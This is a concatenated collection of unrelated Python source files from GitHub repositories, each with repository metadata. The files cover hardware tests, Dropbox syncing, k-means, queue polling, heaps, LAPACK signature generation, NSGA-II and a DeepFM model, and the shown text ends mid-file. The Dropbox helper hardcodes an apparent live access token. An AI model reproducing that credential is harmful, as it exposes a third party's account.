ca128136c7a63d4f70b2d6bc02bb47eeb3885205
6d2df64e318983640a3f26e6ef95ffd00a166e54
/Development/Tests/Vin_Voltage.py
684a12a6b3a9af7e45b444f9d3190699d08cd538
[]
no_license
sgbbhat/SolderStationAuto
2c9145f87b1e404d0e319fcdfe9612f2f095b30a
8ed10cd8228253b7679533cc5d4f71c93b2803a7
refs/heads/master
2020-06-13T17:34:21.552052
2019-10-30T19:42:26
2019-10-30T19:42:26
194,733,660
0
0
null
null
null
null
UTF-8
Python
false
false
1,150
py
# Function to measure battery voltage and display test from tkinter import END from os import * import time import re from Tests.displayResult import displayResult from tkinter import * from tkinter import messagebox def Vin_Voltage(root, key, val, databaseHandle, mfgID, Sln, TestNameText, MinLimitText, MaxLimitText, MeasurementText, ResultText, modelFileContent, testStartTime, OperationMode, OperationModeInput, LotNumvberInput): rawScale = popen('megaioind 0 ruin 3').read() measurement = float(rawScale) if measurement < float(val[1]) or measurement > float(val[2]) : messagebox.showerror("Error", "Check if the bridge is Soldered \n \nSolder the bridge and press OK") rawScale = popen('megaioind 0 ruin 3').read() measurement = float(rawScale) result = 'Pass' if measurement > float(val[1]) and measurement < float(val[2]) else 'Fail' mod_TestName = re.sub(r"(\w)([A-Z])", r"\1 \2", key) # Display Test and results displayResult(TestNameText, MinLimitText, MaxLimitText, MeasurementText, ResultText, mod_TestName, val, measurement, result) # Return test results if result == "Fail": return False else: return True
cc6c7bd30039caf0625491719ee498eb3ca75398
d0a5f10d54bc336fba4c341c59297d8a75886c24
/dropbox_helper.py
8650f2f4a74b8c98decb7bac38f698325a8bf227
[]
no_license
azabujuban/sleeping_pattern
89ca22d4a371de412bd96657157556c943786a49
ed3538804cdfe1c18f6f198e417a064c75c1bef1
refs/heads/master
2021-01-01T19:46:39.357136
2014-12-08T15:22:36
2014-12-08T15:22:36
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,500
py
__author__ = 'maxlevy' from dropbox import client import os class DropboxHelper(): def __init__(self): self.api_client = None try: access_token = 'qsEe-HKsKCEAAAAAAAAGVx_DNOVFQCrjtcsAEFNeTeenQ1NwKsis-51HZDpYjwG2' self.api_client = client.DropboxClient(access_token) except IOError: pass # don't worry if it's not there def mirror_tlog_files(self, remote_folder, local_folder): """ Copy file from Dropbox to local file and print out the metadata. Examples: Dropbox> get file.txt ~/dropbox-file.txt """ local_folder = os.path.expanduser(local_folder) + '/' + remote_folder.split('/')[-1:][0] if not os.path.exists(local_folder): os.makedirs(local_folder) md = self.api_client.metadata(remote_folder) tlog_folders = [_['path'] for _ in md['contents'] if _['is_dir'] and not 'Media' in _['path']] for tlog_folder in tlog_folders: print('Checking in', tlog_folder) # step into that folder, adjust the local folder too self.mirror_tlog_files(tlog_folder, local_folder + "/" + tlog_folder.split("/")[-1:][0]) tlog_paths = [_['path'] for _ in md['contents'] if 'TransactionLog' in _['path'][-len('TransactionLog0.tlog'):]] for tlog_path in tlog_paths: # if the size differs - copy it remote_size = self.api_client.metadata(tlog_path)['bytes'] tlog_local_path = local_folder + '/' + tlog_path.split('/')[-1:][0] local_size = os.path.getsize(tlog_local_path) if os.path.exists(tlog_local_path) else 0 if remote_size == local_size: #print('Skipping copy for ', tlog_path.split('/')[-1:][0], '- the local copy has the same size: ', tlog_local_path) continue to_file = open(tlog_local_path, "wb") f, metadata = self.api_client.get_file_and_metadata(tlog_path) print('Copying ', tlog_path.split('/')[-1:][0], ' into ', tlog_local_path) to_file.write(f.read()) def do_ls(self, path): """list files in current remote directory""" resp = self.api_client.metadata(path) images = [] if 'contents' in resp: for f in resp['contents']: name = os.path.basename(f['path']) #encoding = locale.getdefaultlocale()[1] or 'ascii' #self.stdout.write(('%s\n' % name).encode(encoding)) images.append(name) return images def get_shared_url(self, file_pathname): url_short = self.do_share(file_pathname) # will get you something like https://db.tt/0By6ntxQ # now need to navigate there and take the real URL, someting like # https://www.dropbox.com/s/7m2nt9baimhejac/430D98CA-2F75-45EF-ACA1-9837992E8F8B.jpg?dl=0 import urllib page = urllib.request.urlopen(url_short) url = page.geturl() # now just get rid of the ?dl=0 parameter from urllib.parse import urlparse o = urlparse(url) imgUrl = o.scheme + '://' + o.netloc + o.path return imgUrl def do_share(self, path): """Create a link to share the file at the given path.""" return self.api_client.share(path)['url']
b8811aa2495584808df47112d19fab3fa7a3e441
952793f6d2444b1d8221cf584a5c629c54806f95
/kmeans.py
a6e4db68c23b70d2e34b0bed4a3426be000a2eac
[]
no_license
scopegeneral/MiniProjects
24f57225e075e33ae05af036864e3ad21cbfe673
554cda16f03f1d94bb7380df4446146cde862aab
refs/heads/master
2020-03-23T09:49:59.835655
2018-07-21T05:02:45
2018-07-21T05:02:45
141,410,083
0
0
null
null
null
null
UTF-8
Python
false
false
1,404
py
import numpy as np import imageio import matplotlib.pyplot as plt def initKMeans(X, K): [m, n] = X.shape rand_idx = np.random.permutation(m) rand_idx = rand_idx[:K] centroids = X[rand_idx,:] return centroids def findClosestCentroids(X, initial_centroids): [K, n] = initial_centroids.shape [m, n] = X.shape distances = np.zeros((m,K)) for i in range(K): centroid_i = np.array([initial_centroids[i,:],]*m) distances_i = (X - centroid_i)**2 distances[:,i] = distances_i.sum(axis = 1) idx = np.argmin(distances,axis = 1) return idx def computeCentroids(X, idx, K): [m, n] = X.shape centroids = np.zeros((K,n)) for i in range(K): group_i = X[idx == i,:] centroids[i,:] = group_i.sum(axis = 0)/group_i.shape[0] return centroids if __name__ == "__main__": A = imageio.imread(r"C:\Users\320004436\OneDrive - Philips\Desktop\Cp\test3.jpg") A = A / 255 image_size = A.shape A = np.reshape(A, (image_size[0]*image_size[1],3)) K = 16 max_iter = 10 centroids = initKMeans(A, K) for i in range(max_iter): print("K-Means Iteration {}/{}".format(i+1,max_iter)) idx = findClosestCentroids(A, centroids) centroids = computeCentroids(A, idx, K) A_compressed = centroids[idx,:] A_compressed = np.reshape(A_compressed,(image_size[0],image_size[1],3)) plt.figure() plt.imshow(A_compressed) plt.show()
581d5e4892904165e00c1562bbdcc03dfe1ec4fc
ae1a91ba30fc82f1db484beca76fbb95ab835b2f
/apps/channel/management/commands/_archive/poll_queue.py
6beabbdeb682eddbb3f9ee8556cd7965a314c570
[]
no_license
IntelligentTrading/clover
fa6728819e10c0357a5a3d5345581f6647bb1e68
84fa62eab4fd05ca6ee9fd966fc9981d5073ffd1
refs/heads/master
2022-10-15T23:20:11.849176
2019-07-17T14:09:54
2019-07-17T14:09:54
160,502,598
0
2
null
null
null
null
UTF-8
Python
false
false
5,135
py
import json import logging import datetime from django.core.management.base import BaseCommand from django.db import IntegrityError from apps.channel.incoming_queue import SqsListener from apps.indicator.models import Price, Volume, PriceHistory from taskapp.helpers.common import get_source_name from settings import INCOMING_SQS_QUEUE, COUNTER_CURRENCY_CHOICES, BINANCE logger = logging.getLogger(__name__) class Command(BaseCommand): help = "Polls price data from the incoming queue" def handle(self, *args, **options): logger.info("Getting ready to poll prices from the queue") listener = SqsListener(INCOMING_SQS_QUEUE, wait_time=10) listener.handler = process_message_from_queue listener.listen() # * Standart Format # symbols_info = [ # { 'source': 'poloniex', # 'category': 'price', # or 'volume' # 'symbol': 'BTC/USDT' # LTC/BTC # 'value': 12345678, # 'timestamp': 1522066118.23 # }, ... # ] def process_message_from_queue(message_body): "Save SQS message to DB: Price, Volume and PriceHistory" body_dict = json.loads(message_body) subject = body_dict['Subject'] items = json.loads(body_dict['Message']) #processed = [] for item in items: # logger.debug(f"Save {item['category']} for {item['symbol']} from {item['source']}") # source_code = next((code for code, source_text in SOURCE_CHOICES if source_text == item['source']), None) source_code = BINANCE (transaction_currency, counter_curency_text) = item['symbol'].split('/') counter_currency_code = next((code for code, counter_currency in COUNTER_CURRENCY_CHOICES if counter_currency == counter_curency_text), None) if None in (source_code, counter_currency_code): continue # skip this source or counter_currency if subject == 'prices_volumes' and item['category'] == 'price': try: price = int(float(item['value']) * 10 ** 8) # convert to satoshi Price.objects.create( source=source_code, transaction_currency=transaction_currency, counter_currency=counter_currency_code, price=price, timestamp=item['timestamp'] ) #processed.append("{}/{}".format(transaction_currency, counter_currency_code)) # logger.debug(">>> Price saved: source={}, transaction_currency={}, counter_currency={}, price={}, timestamp={}".format( # source_code, transaction_currency, counter_currency_code, price, item['timestamp'])) except Exception as e: logger.debug(f">>>> Error saving Price for {item['symbol']} from: {item['source']}. {e}") elif subject == 'prices_volumes' and item['category'] == 'volume': try: volume = float(item['value']) Volume.objects.create( source=source_code, transaction_currency=transaction_currency, counter_currency=counter_currency_code, volume=volume, timestamp=item['timestamp'] ) # logger.debug(">>> Volume saved: source={}, transaction_currency={}, counter_currency={}, volume={}, timestamp={}".format( # source_code, transaction_currency, counter_currency_code, volume, item['timestamp'])) except Exception as e: logger.debug(f">>>> Error saving Volume for {item['symbol']} from: {item['source']}. {e}") elif subject == 'ohlc_prices': try: PriceHistory.objects.create( source=source_code, transaction_currency=transaction_currency, counter_currency=counter_currency_code, open_p=to_satoshi(item['popen']), high=to_satoshi(item['high']), low=to_satoshi(item['low']), close=to_satoshi(item['close']), timestamp=datetime.datetime.utcfromtimestamp(item['timestamp']), volume=get_volume(item['bvolume']) ) except IntegrityError as e: pass # logger.debug(f">>> Dublicated record for PriceHistory.\n{e}") except Exception as e: logger.debug(f">>>> Error saving PriceHistory for {item['symbol']} from: {item['source']}. {e}") #logger.debug(f">>> OHLC history price saved. Source:{source_code}, {transaction_currency}_{counter_currency_code}") #logger.debug("Message for {} saved to db. Coins: {}".format(get_source_name(source_code), ",".join(processed))) logger.info(f"Message for {get_source_name(source_code)} ({subject}) saved to db") # Little helpers def to_satoshi(value): try: return int(float(value) * 10 ** 8) except: return None def get_volume(value): try: return float(value) except: return None
dfb7a671ee5633e18c11d844bae922e69660677e
ca5339f667a5ef6a9faa149413d836cd3c1bb069
/heap.py
4436234f9e4cb9351b57f92847cf108f80802aff
[]
no_license
alanlyyy/PythonHeaps
47b2baed57344d5e75328b55dfd3ae9b9d968e76
9732b45fb939d5538a3529d379953572ebc7f1af
refs/heads/master
2020-09-14T09:41:45.597355
2019-11-21T05:17:33
2019-11-21T05:17:33
223,093,523
0
0
null
null
null
null
UTF-8
Python
false
false
4,418
py
#max number of items that can be stored in the heap CAPACITY = 8 class HeapBase: def __init__(self): #create an array with capacity elements self.heap = [0]*CAPACITY #counter to keep track of num items in heap self.heap_size = 0 #O(logN) because need to make sure heap propertises are not violated def insert(self, item): #if capacity is reached don't insert any more items if CAPACITY == self.heap_size: return #insert the item + increment the counter self.heap[self.heap_size] = item self.heap_size += 1 #1. insert item to last position of array #2. Validate heap properties are not violated self.upHeap(self.heap_size-1) #O(logN) def upHeap(self, index): """check if node meets heap properties, otherwise swap nodes until the heap properties are met going up the tree. (upheap) """ #get the parent index parent_index = (index-1)//2 #integer division #while root node is not reached and the parent node is smaller than child node if index > 0 and self.heap[index] >self.heap[parent_index]: #swap parent and child node self.swap(index,parent_index) #recursively go up the tree self.upHeap(parent_index) def swap(self, index1, index2): self.heap[index2], self.heap[index1] = self.heap[index1], self.heap[index2] #O(1) def get_max(self): #return the root node return self.heap[0] #O(logN) def removeMax(self): """Return the max item + removes it from the heap. Check if node is in correct position not violating heap properties. """ max = self.get_max() #swap last element with root node self.swap(0,self.heap_size-1) #update the size self.heap_size = self.heap_size - 1 #move the root node down the heap to not violate heap properties. self.downHeap(0) return max def downHeap(self, index): """From the root node, swap the parent node with its children if child nodes are larger than parent node. To insure heap properties are met. """ index_left = 2*index + 1 index_right = 2*index + 2 #max heap parent node is greater than child node index_largest = index #while heap is within size of array and left index is greater than parent node if index_left < self.heap_size and self.heap[index_left] > self.heap[index]: index_largest = index_left #check if the right child is greater then the left child: largest is right node if index_right < self.heap_size and self.heap[index_right] > self.heap[index_largest]: index_largest = index_right if index != index_largest: #swap the parent node with child node self.swap(index,index_largest) #go down the heap with largest node self.downHeap(index_largest) def heap_sort(self): """Sort N nodes in heap. Every removeMax operation called takes O(logN) because of downHeap() Complete running time: O(N*logN) """ tempList = [] #store size of heap size = self.heap_size for i in range(0,size): #call removeMax N times to return max element and remove max every iteration max = self.removeMax() tempList.append(max) #print(max._key,max._value,max._price) for i in range(0,size): self.insert(tempList[i]) if __name__ == '__main__': heap = HeapBase() heap.insert(10) heap.insert(8) heap.insert(12) heap.insert(20) heap.insert(-2) heap.insert(0) heap.insert(1) heap.insert(321) heap.heap_sort()
cec69055122f7d6681aafa3340f9b1e6c99ab682
999879f8d18e041d7fa313132408b252aded47f8
/01-codes/scipy-master/scipy/linalg/_cython_signature_generator.py
3e32f4ee3bff69c241712515ab32a5fa027911ff
[ "MIT" ]
permissive
QPanProjects/Surrogate-Model
ebcaf05728e82dcbcd924c2edca1b490ab085173
848c7128201218b0819c9665e2cec72e3b1d29ac
refs/heads/master
2022-10-11T19:03:55.224257
2020-06-09T14:37:35
2020-06-09T14:37:35
null
0
0
null
null
null
null
UTF-8
Python
false
false
8,372
py
""" A script that uses f2py to generate the signature files used to make the Cython BLAS and LAPACK wrappers from the fortran source code for LAPACK and the reference BLAS. To generate the BLAS wrapper signatures call: python _cython_signature_generator.py blas <blas_directory> <out_file> To generate the LAPACK wrapper signatures call: python _cython_signature_generator.py lapack <lapack_src_directory> <out_file> """ import glob from numpy.f2py import crackfortran sig_types = {'integer': 'int', 'complex': 'c', 'double precision': 'd', 'real': 's', 'complex*16': 'z', 'double complex': 'z', 'character': 'char', 'logical': 'bint'} def get_type(info, arg): argtype = sig_types[info['vars'][arg]['typespec']] if argtype == 'c' and info['vars'][arg].get('kindselector') is not None: argtype = 'z' return argtype def make_signature(filename): info = crackfortran.crackfortran(filename)[0] name = info['name'] if info['block'] == 'subroutine': return_type = 'void' else: return_type = get_type(info, name) arglist = [' *'.join([get_type(info, arg), arg]) for arg in info['args']] args = ', '.join(arglist) # Eliminate strange variable naming that replaces rank with rank_bn. args = args.replace('rank_bn', 'rank') return '{0} {1}({2})\n'.format(return_type, name, args) def get_sig_name(line): return line.split('(')[0].split(' ')[-1] def sigs_from_dir(directory, outfile, manual_wrappers=None, exclusions=None): if directory[-1] in ['/', '\\']: directory = directory[:-1] files = glob.glob(directory + '/*.f*') if exclusions is None: exclusions = [] if manual_wrappers is not None: exclusions += [get_sig_name(l) for l in manual_wrappers.split('\n')] signatures = [] for filename in files: name = filename.split('\\')[-1][:-2] if name in exclusions: continue signatures.append(make_signature(filename)) if manual_wrappers is not None: signatures += [l + '\n' for l in manual_wrappers.split('\n')] signatures.sort(key=get_sig_name) comment = ["# This file was generated by _cython_wrapper_generators.py.\n", "# Do not edit this file directly.\n\n"] with open(outfile, 'w') as f: f.writelines(comment) f.writelines(signatures) # The signature that is used for zcgesv in lapack 3.1.0 and 3.1.1 changed # in version 3.2.0. The version included in the clapack on OSX has the # more recent signature though. # slamch and dlamch are not in the lapack src directory, but,since they # already have Python wrappers, we'll wrap them as well. # The other manual signatures are used because the signature generating # functions don't work when function pointer arguments are used. lapack_manual_wrappers = '''void cgees(char *jobvs, char *sort, cselect1 *select, int *n, c *a, int *lda, int *sdim, c *w, c *vs, int *ldvs, c *work, int *lwork, s *rwork, bint *bwork, int *info) void cgeesx(char *jobvs, char *sort, cselect1 *select, char *sense, int *n, c *a, int *lda, int *sdim, c *w, c *vs, int *ldvs, s *rconde, s *rcondv, c *work, int *lwork, s *rwork, bint *bwork, int *info) void cgges(char *jobvsl, char *jobvsr, char *sort, cselect2 *selctg, int *n, c *a, int *lda, c *b, int *ldb, int *sdim, c *alpha, c *beta, c *vsl, int *ldvsl, c *vsr, int *ldvsr, c *work, int *lwork, s *rwork, bint *bwork, int *info) void cggesx(char *jobvsl, char *jobvsr, char *sort, cselect2 *selctg, char *sense, int *n, c *a, int *lda, c *b, int *ldb, int *sdim, c *alpha, c *beta, c *vsl, int *ldvsl, c *vsr, int *ldvsr, s *rconde, s *rcondv, c *work, int *lwork, s *rwork, int *iwork, int *liwork, bint *bwork, int *info) void dgees(char *jobvs, char *sort, dselect2 *select, int *n, d *a, int *lda, int *sdim, d *wr, d *wi, d *vs, int *ldvs, d *work, int *lwork, bint *bwork, int *info) void dgeesx(char *jobvs, char *sort, dselect2 *select, char *sense, int *n, d *a, int *lda, int *sdim, d *wr, d *wi, d *vs, int *ldvs, d *rconde, d *rcondv, d *work, int *lwork, int *iwork, int *liwork, bint *bwork, int *info) void dgges(char *jobvsl, char *jobvsr, char *sort, dselect3 *selctg, int *n, d *a, int *lda, d *b, int *ldb, int *sdim, d *alphar, d *alphai, d *beta, d *vsl, int *ldvsl, d *vsr, int *ldvsr, d *work, int *lwork, bint *bwork, int *info) void dggesx(char *jobvsl, char *jobvsr, char *sort, dselect3 *selctg, char *sense, int *n, d *a, int *lda, d *b, int *ldb, int *sdim, d *alphar, d *alphai, d *beta, d *vsl, int *ldvsl, d *vsr, int *ldvsr, d *rconde, d *rcondv, d *work, int *lwork, int *iwork, int *liwork, bint *bwork, int *info) d dlamch(char *cmach) void ilaver(int *vers_major, int *vers_minor, int *vers_patch) void sgees(char *jobvs, char *sort, sselect2 *select, int *n, s *a, int *lda, int *sdim, s *wr, s *wi, s *vs, int *ldvs, s *work, int *lwork, bint *bwork, int *info) void sgeesx(char *jobvs, char *sort, sselect2 *select, char *sense, int *n, s *a, int *lda, int *sdim, s *wr, s *wi, s *vs, int *ldvs, s *rconde, s *rcondv, s *work, int *lwork, int *iwork, int *liwork, bint *bwork, int *info) void sgges(char *jobvsl, char *jobvsr, char *sort, sselect3 *selctg, int *n, s *a, int *lda, s *b, int *ldb, int *sdim, s *alphar, s *alphai, s *beta, s *vsl, int *ldvsl, s *vsr, int *ldvsr, s *work, int *lwork, bint *bwork, int *info) void sggesx(char *jobvsl, char *jobvsr, char *sort, sselect3 *selctg, char *sense, int *n, s *a, int *lda, s *b, int *ldb, int *sdim, s *alphar, s *alphai, s *beta, s *vsl, int *ldvsl, s *vsr, int *ldvsr, s *rconde, s *rcondv, s *work, int *lwork, int *iwork, int *liwork, bint *bwork, int *info) s slamch(char *cmach) void zgees(char *jobvs, char *sort, zselect1 *select, int *n, z *a, int *lda, int *sdim, z *w, z *vs, int *ldvs, z *work, int *lwork, d *rwork, bint *bwork, int *info) void zgeesx(char *jobvs, char *sort, zselect1 *select, char *sense, int *n, z *a, int *lda, int *sdim, z *w, z *vs, int *ldvs, d *rconde, d *rcondv, z *work, int *lwork, d *rwork, bint *bwork, int *info) void zgges(char *jobvsl, char *jobvsr, char *sort, zselect2 *selctg, int *n, z *a, int *lda, z *b, int *ldb, int *sdim, z *alpha, z *beta, z *vsl, int *ldvsl, z *vsr, int *ldvsr, z *work, int *lwork, d *rwork, bint *bwork, int *info) void zggesx(char *jobvsl, char *jobvsr, char *sort, zselect2 *selctg, char *sense, int *n, z *a, int *lda, z *b, int *ldb, int *sdim, z *alpha, z *beta, z *vsl, int *ldvsl, z *vsr, int *ldvsr, d *rconde, d *rcondv, z *work, int *lwork, d *rwork, int *iwork, int *liwork, bint *bwork, int *info)''' if __name__ == '__main__': from sys import argv libname, src_dir, outfile = argv[1:] # Exclude scabs and sisnan since they aren't currently included # in the scipy-specific ABI wrappers. if libname.lower() == 'blas': sigs_from_dir(src_dir, outfile, exclusions=['scabs1', 'xerbla']) elif libname.lower() == 'lapack': # Exclude all routines that do not have consistent interfaces from # LAPACK 3.1.0 through 3.6.0. # Also exclude routines with string arguments to avoid # compatibility woes with different standards for string arguments. # Exclude sisnan and slaneg since they aren't currently included in # The ABI compatibility wrappers. exclusions = ['sisnan', 'csrot', 'zdrot', 'ilaenv', 'iparmq', 'lsamen', 'xerbla', 'zcgesv', 'dlaisnan', 'slaisnan', 'dlazq3', 'dlazq4', 'slazq3', 'slazq4', 'dlasq3', 'dlasq4', 'slasq3', 'slasq4', 'dlasq5', 'slasq5', 'slaneg', # Routines deprecated in LAPACK 3.6.0 'cgegs', 'cgegv', 'cgelsx', 'cgeqpf', 'cggsvd', 'cggsvp', 'clahrd', 'clatzm', 'ctzrqf', 'dgegs', 'dgegv', 'dgelsx', 'dgeqpf', 'dggsvd', 'dggsvp', 'dlahrd', 'dlatzm', 'dtzrqf', 'sgegs', 'sgegv', 'sgelsx', 'sgeqpf', 'sggsvd', 'sggsvp', 'slahrd', 'slatzm', 'stzrqf', 'zgegs', 'zgegv', 'zgelsx', 'zgeqpf', 'zggsvd', 'zggsvp', 'zlahrd', 'zlatzm', 'ztzrqf'] sigs_from_dir(src_dir, outfile, manual_wrappers=lapack_manual_wrappers, exclusions=exclusions)
8458f4465852fe16d436942d35b6d77d1c651164
706f13fdcf9661040158a9effbfdf5a93ca95ac9
/app9.py
ca3e3fca0ccdb34a8f7f8eded59d6a328f50f27b
[]
no_license
123shukla/samy-web
200eb47dca17a810bfc1474e0cfcefad54930d2a
6d0fe06db54d19201a30e30c3c819ab6340bafcf
refs/heads/main
2022-12-29T05:40:28.982799
2020-10-13T07:31:05
2020-10-13T07:31:05
303,619,403
0
0
null
null
null
null
UTF-8
Python
false
false
380
py
import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output from app import app layout = html.Div([ html.H3('Node 9'), dcc.Link('Go to Node 2', href='/apps/app2'), html.Br(), dcc.Link('Go to Node 15', href='/apps/app15'), html.Br(), dcc.Link('Go to Node 10', href='/apps/app10'), ])
c1749a91a063e221eaf223f62ef9141b352ea7b7
39fbbfd88540111850c4591e70f1dd35d4ca4634
/test-nsga2.py
ab530f516329acf77ef053a20130c5cb740c5093
[]
no_license
Robert-MYM/Nuaa_ASE-Project_one
7166f2cc0e0886491fc1e9e22ab0f648fd538498
cc2a7e81b759b5f8f15f5d1c55e0f82375f76cb9
refs/heads/master
2020-06-01T02:14:33.083619
2019-06-11T08:57:36
2019-06-11T08:57:36
190,593,327
0
0
null
null
null
null
UTF-8
Python
false
false
2,033
py
from jmetal.algorithm.multiobjective.nsgaii import NSGAII from jmetal.operator import BinaryTournamentSelection, BitFlipMutation, SPXCrossover,PolynomialMutation,SBXCrossover from jmetal.problem.multiobjective.unconstrained import OneZeroMax from jmetal.util.comparator import RankingAndCrowdingDistanceComparator, DominanceComparator from jmetal.util.observer import ProgressBarObserver, VisualizerObserver from jmetal.util.solution_list import print_function_values_to_file, print_variables_to_file from jmetal.util.termination_criterion import StoppingByEvaluations import ZDT1,DTLZ1,HRES if __name__ == '__main__': #binary_string_length = 512 #problem = OneZeroMax(binary_string_length) #problem = ZDT1.ZDT1() problem = HRES.HRES() max_evaluations = 50000 algorithm = NSGAII( problem=problem, population_size=100, offspring_population_size=100, #mutation=BitFlipMutation(probability=1.0 / binary_string_length), mutation=PolynomialMutation(probability=1.0/problem.number_of_variables,distribution_index=20), #crossover=SPXCrossover(probability=1.0), crossover=SBXCrossover(probability=1.0,distribution_index=20), selection=BinaryTournamentSelection(comparator=RankingAndCrowdingDistanceComparator()), termination_criterion=StoppingByEvaluations(max=max_evaluations), #dominance_comparator=DominanceComparator() ) algorithm.observable.register(observer=ProgressBarObserver(max=max_evaluations)) algorithm.observable.register(observer=VisualizerObserver()) algorithm.run() front = algorithm.get_result() # Save results to file print_function_values_to_file(front, 'FUN.' + algorithm.get_name() + "-" + problem.get_name()) print_variables_to_file(front, 'VAR.' + algorithm.get_name() + "-" + problem.get_name()) print('Algorithm (continuous problem): ' + algorithm.get_name()) print('Problem: ' + problem.get_name()) print('Computing time: ' + str(algorithm.total_computing_time))
03bf0178032d170f8e311d11f4a3aa46d2dc98ba
caae8bec3b48d2805c2b1bd9db053026bf78d074
/tests/test.py
fb364def5456abb9fb01ce116e5a44365e35131e
[ "MIT" ]
permissive
worldwidekatie/study_guide
69ccbeaef7c5a6ce5fbeffa7b115d20dfe42a843
bc7a67f331990d07463c6ac9413eef283e555ad0
refs/heads/master
2022-06-19T14:14:54.225242
2020-05-07T22:58:16
2020-05-07T22:58:16
262,132,903
0
0
null
null
null
null
UTF-8
Python
false
false
220
py
import unittest from ..my_studyguide.math1 import Math1 class Math1Tests(unittest.TestCase): def test_addition(self): self.assertEqual(Math1.addition, 30) if __name__ == "__main__": unittest.main()
97f76feb72609a46af6c644c9ed643b1a6dd4f6f
8e2648e3ec0f777ba47f0688e455f2a997e1da05
/com/shujia/day1/demo5.py
1e20db33ef2e7956f9d5c154dd5b094d7174ec61
[]
no_license
MLlibfiy/python
c3ac27e81943bc669624198b6ac9c753c067f054
1d088bf3f9111185001230de0ee06bc760dc8ae8
refs/heads/master
2020-04-13T03:52:46.129152
2018-12-29T02:48:26
2018-12-29T02:48:26
162,944,627
2
1
null
null
null
null
UTF-8
Python
false
false
468
py
# coding=utf-8 if __name__ == '__main__': # 集合 无序,不唯一 set1 = {"shu", "jia", 1, "a", "a"} print set1 # 创建空的集合 set2 = set() set2.add("java") set2.add("java") set2.add("java") set2.add("scala") print set2 set4 = {1, 2, 3, 4, 5, 6} set5 = {4, 5, 6, 7, 8, 9} print set4 | set5 # 并集 print set4 & set5 # 交集 print set4 - set5 # 差集 print set4 ^ set5 # 对称集
03e0224bd1d127b915a20878ed3192e0ad6658fd
904a13bb38e8f73dba4081becf41dbeea0ea21d5
/scripts/export_titers_for_auspice_v1.py
7b6c15cbf368f005a93b86cad9cf35d61656706e
[]
no_license
nextstrain/seasonal-flu
a78bc645d5dc4e1c73b5acdb7e2ddd9ea8f88f19
48a0ed2aecb6ea16b2483f136f718c618fdfd1e7
refs/heads/master
2023-08-04T06:31:08.278580
2023-08-01T18:56:29
2023-08-01T18:56:29
154,029,525
35
20
null
2023-09-08T22:19:40
2018-10-21T16:36:00
Python
UTF-8
Python
false
false
1,193
py
#!/usr/bin/env python3 import argparse import json if __name__ == '__main__': parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument("--titers-sub") parser.add_argument("--titers-tree") parser.add_argument("--output-titers") parser.add_argument("--output-titers-sub") parser.add_argument("--output-titers-tree") args = parser.parse_args() with open(args.titers_sub) as fh: sub = json.load(fh) with open(args.output_titers_sub, 'wt') as sub_file: json.dump({'avidity': sub['avidity'], 'potency': sub['potency'], 'substitution': sub['substitution']}, sub_file, indent=1) with open(args.output_titers, 'wt') as raw_file: json.dump(sub['titers'], raw_file, indent=1) with open(args.titers_tree) as fh: tree = json.load(fh) with open(args.output_titers_tree, 'wt') as tree_file: json.dump({'avidity': tree['avidity'], 'potency': tree['potency'], 'dTiter': {k:v['dTiter'] for k,v in tree['nodes'].items()}}, tree_file, indent=1)
efc9f072d5d8de144abc02d994905ccb7de0c700
db3981b8d30db9ec0e3ee8242ed918a7c5988aa1
/AlgoDescription.py
7908a1dec8a3dfde8cd874ba98bc226dc031c26d
[]
no_license
nigamv/datasciencetool
eebacbd412a2febad87bbf2848127137519431a4
b70c9446a8f9c41a3e1dc257bb8633e3f5737ff6
refs/heads/master
2020-03-29T13:01:07.500757
2019-05-29T20:37:55
2019-05-29T20:37:55
149,935,719
0
0
null
null
null
null
UTF-8
Python
false
false
370
py
''' Created on Feb 11, 2016 @author: vibhor ''' class AlgoDescription: algorithms =("There are various algorithms available for processing data and getting desired outputs." "These algorithms are divided in two different ways, supervised and un-supervised learning algorithm " "and regression and classification algorithms.")
ff06a8c08e99f929e422c16fb959c283ab298bbe
0c6488fd370f8d0e18173ab77eb9443fd61d0576
/easy_rec/python/model/deepfm.py
f17bec0beb1edaf64e7f166e11d23c14d57b7fca
[ "Apache-2.0" ]
permissive
geogubd/EasyRec
96a6d32d2795057cc69d5ba4e8948033bdd3e308
d4bfd3b40bce1b990a9206112a9429dbd262a116
refs/heads/master
2023-09-04T02:59:28.832855
2021-10-18T05:19:56
2021-10-18T05:19:56
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,459
py
# -*- encoding:utf-8 -*- # Copyright (c) Alibaba, Inc. and its affiliates. import tensorflow as tf from easy_rec.python.layers import dnn from easy_rec.python.layers import fm from easy_rec.python.layers import input_layer from easy_rec.python.model.rank_model import RankModel from easy_rec.python.protos.deepfm_pb2 import DeepFM as DeepFMConfig if tf.__version__ >= '2.0': tf = tf.compat.v1 class DeepFM(RankModel): def __init__(self, model_config, feature_configs, features, labels=None, is_training=False): super(DeepFM, self).__init__(model_config, feature_configs, features, labels, is_training) assert self._model_config.WhichOneof('model') == 'deepfm', \ 'invalid model config: %s' % self._model_config.WhichOneof('model') self._model_config = self._model_config.deepfm assert isinstance(self._model_config, DeepFMConfig) # backward compatibility if self._model_config.HasField('wide_regularization'): tf.logging.warn( 'wide_regularization is deprecated, please use l2_regularization') self._wide_features, _ = self._input_layer(self._feature_dict, 'wide') self._deep_features, self._fm_features = self._input_layer( self._feature_dict, 'deep') if 'fm' in self._input_layer._feature_groups: _, self._fm_features = self._input_layer(self._feature_dict, 'fm') def build_input_layer(self, model_config, feature_configs): # overwrite create input_layer to support wide_output_dim has_final = len(model_config.deepfm.final_dnn.hidden_units) > 0 if not has_final: assert model_config.deepfm.wide_output_dim == model_config.num_class self._input_layer = input_layer.InputLayer( feature_configs, model_config.feature_groups, model_config.deepfm.wide_output_dim, use_embedding_variable=model_config.use_embedding_variable, embedding_regularizer=self._emb_reg, kernel_regularizer=self._l2_reg) def build_predict_graph(self): # Wide wide_fea = tf.reduce_sum( self._wide_features, axis=1, keepdims=True, name='wide_feature') # FM fm_fea = fm.FM(name='fm_feature')(self._fm_features) # Deep deep_layer = dnn.DNN(self._model_config.dnn, self._l2_reg, 'deep_feature', self._is_training) deep_fea = deep_layer(self._deep_features) # Final if len(self._model_config.final_dnn.hidden_units) > 0: all_fea = tf.concat([wide_fea, fm_fea, deep_fea], axis=1) final_dnn_layer = dnn.DNN(self._model_config.final_dnn, self._l2_reg, 'final_dnn', self._is_training) all_fea = final_dnn_layer(all_fea) output = tf.layers.dense( all_fea, self._num_class, 